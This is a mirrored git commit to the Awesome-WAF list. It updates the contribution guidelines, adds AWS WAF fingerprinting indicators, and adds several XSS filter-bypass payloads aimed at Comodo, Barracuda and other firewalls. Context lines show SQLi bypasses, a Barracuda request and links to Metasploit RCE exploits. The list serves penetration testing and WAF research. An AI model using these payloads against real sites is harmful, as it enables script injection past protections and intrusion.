mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 21:33:32 +07:00
Added some more stuffs
This commit is contained in:
parent
43dac6751a
commit
b0fbde4da9
@ -22,7 +22,10 @@ __Your pull request/commit message will be a tweet, please keep that in mind.__
|
|||||||
|
|
||||||
[Awesome-WAF](https://github.com/0xinfection/awesome-waf) is a hand-crafted list for high-quality information about web application firewalls and its resources. Following items are recommended to be kept in mind.
|
[Awesome-WAF](https://github.com/0xinfection/awesome-waf) is a hand-crafted list for high-quality information about web application firewalls and its resources. Following items are recommended to be kept in mind.
|
||||||
|
|
||||||
- Each item should be limited to one link, no duplicates, no redirection (careful with `http` vs `https`!).
|
- If you are submitting a new fingerprint, include the headers/page source, etc.
|
||||||
|
- Do not include the URL as it may expose the integrity of the site.
|
||||||
|
> I will contact you personally if necessary via email.
|
||||||
|
- Item you're adding should not be duplicate, no redirection (be careful with `http` vs `https`!).
|
||||||
- The link should be the name of the slide or project or website.
|
- The link should be the name of the slide or project or website.
|
||||||
- Description should be clear and concise (read it out loud to be sure).
|
- Description should be clear and concise (read it out loud to be sure).
|
||||||
- Description should follow the link, on the same line.
|
- Description should follow the link, on the same line.
|
||||||
@ -37,14 +40,14 @@ We'll guide you to the best of our abilities.
|
|||||||
|
|
||||||
To be on the list, it would be *nice* if entries adhere to these quality standards:
|
To be on the list, it would be *nice* if entries adhere to these quality standards:
|
||||||
|
|
||||||
- Generally useful to the community
|
- Generally useful to the community.
|
||||||
- Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person.
|
- Clearly stating "what is it for": mention the problem it solves. Just try your best, make it clear for the next person.
|
||||||
- Solves a real problem (even a small one)
|
- Solves a real problem (even a small one)
|
||||||
- If your PR is a **WIP** (work in progress, not safe for production), mention it.
|
- If your PR is a **WIP** (work in progress, not safe for production), mention it.
|
||||||
|
|
||||||
If your PR is not merged, I will tell you why so that you may be able to improve it.
|
If your PR is not merged, I will tell you why so that you may be able to improve it.
|
||||||
|
|
||||||
## Awesome Related Contribution Guidelines
|
## Contribution Guidelines
|
||||||
|
|
||||||
### Adding to this List
|
### Adding to this List
|
||||||
|
|
||||||
|
31
README.md
31
README.md
@ -247,8 +247,19 @@ Wanna fingerprint WAFs? Lets see how.
|
|||||||
<li><b>Detectability: </b>Moderate</li>
|
<li><b>Detectability: </b>Moderate</li>
|
||||||
<li><b>Detection Methodology:</b></li>
|
<li><b>Detection Methodology:</b></li>
|
||||||
<ul>
|
<ul>
|
||||||
<li>Response headers contain <code>AWS</code> value.</li>
|
<li>Response headers might contain:
|
||||||
<li>Blocked response status code return <code>403 Forbidden</code> response.</li>
|
<ul>
|
||||||
|
<li><code>AWSALB</code> cookie field value.</li>
|
||||||
|
<li><code>X-AMZ-ID</code> header.</li>
|
||||||
|
<li><code>X-AMZ-REQUEST-ID</code> header.</li>
|
||||||
|
</ul>
|
||||||
|
</li>
|
||||||
|
<li>Response page may contain:
|
||||||
|
<ul>
|
||||||
|
<li><code>Access Denied</code> in their keyword.</li>
|
||||||
|
<li>Request token ID with length from 20 to 25 between <code>RequestId</code> tag.</li>
|
||||||
|
</ul>
|
||||||
|
</li>
|
||||||
</ul>
|
</ul>
|
||||||
</ul>
|
</ul>
|
||||||
</td>
|
</td>
|
||||||
@ -2141,8 +2152,16 @@ Before anything else, you should hone up skills from [Google Dorks Cheat Sheet](
|
|||||||
```
|
```
|
||||||
<--`<img/src=` onerror=confirm``> --!>
|
<--`<img/src=` onerror=confirm``> --!>
|
||||||
```
|
```
|
||||||
|
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v)
|
||||||
|
```
|
||||||
|
<a"/onclick=(confirm)()>click
|
||||||
|
```
|
||||||
|
|
||||||
### Comodo
|
### Comodo
|
||||||
|
- XSS Bypass by [@s0md3v](https://twiiter.com/s0md3v)
|
||||||
|
```
|
||||||
|
<d3v/onauxclick=(((confirm)))``>click
|
||||||
|
```
|
||||||
- SQLi by [@WAFNinja](https://waf.ninja)
|
- SQLi by [@WAFNinja](https://waf.ninja)
|
||||||
```
|
```
|
||||||
0 union/**/select 1,version(),@@datadir
|
0 union/**/select 1,version(),@@datadir
|
||||||
@ -2161,6 +2180,10 @@ GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&co
|
|||||||
Host: favoritewaf.com
|
Host: favoritewaf.com
|
||||||
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
|
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
|
||||||
```
|
```
|
||||||
|
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v)
|
||||||
|
```
|
||||||
|
<a/href=Java%0a%0d%09script:alert()>click
|
||||||
|
```
|
||||||
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
|
- [Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40146) by [@xort](https://www.exploit-db.com/?author=479#)
|
||||||
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
|
- [Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit)](https://www.exploit-db.com/exploits/40147) by [@xort](https://www.exploit-db.com/?author=479)
|
||||||
|
|
||||||
@ -2207,6 +2230,10 @@ Keep-Alive: 300
|
|||||||
<isindex action="javas&tab;cript:alert(1)" type=image>
|
<isindex action="javas&tab;cript:alert(1)" type=image>
|
||||||
<marquee/onstart=confirm(2)>
|
<marquee/onstart=confirm(2)>
|
||||||
```
|
```
|
||||||
|
- XSS Bypass by [@s0md3v](https://twitter.com/s0md3v)
|
||||||
|
```
|
||||||
|
<details/open/ontoggle=(confirm)()//
|
||||||
|
```
|
||||||
- GET - XSS Bypass (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741)
|
- GET - XSS Bypass (v4.02) by [@DavidK](https://www.exploit-db.com/?author=2741)
|
||||||
```
|
```
|
||||||
/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
|
/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
|
||||||
|
Loading…
Reference in New Issue
Block a user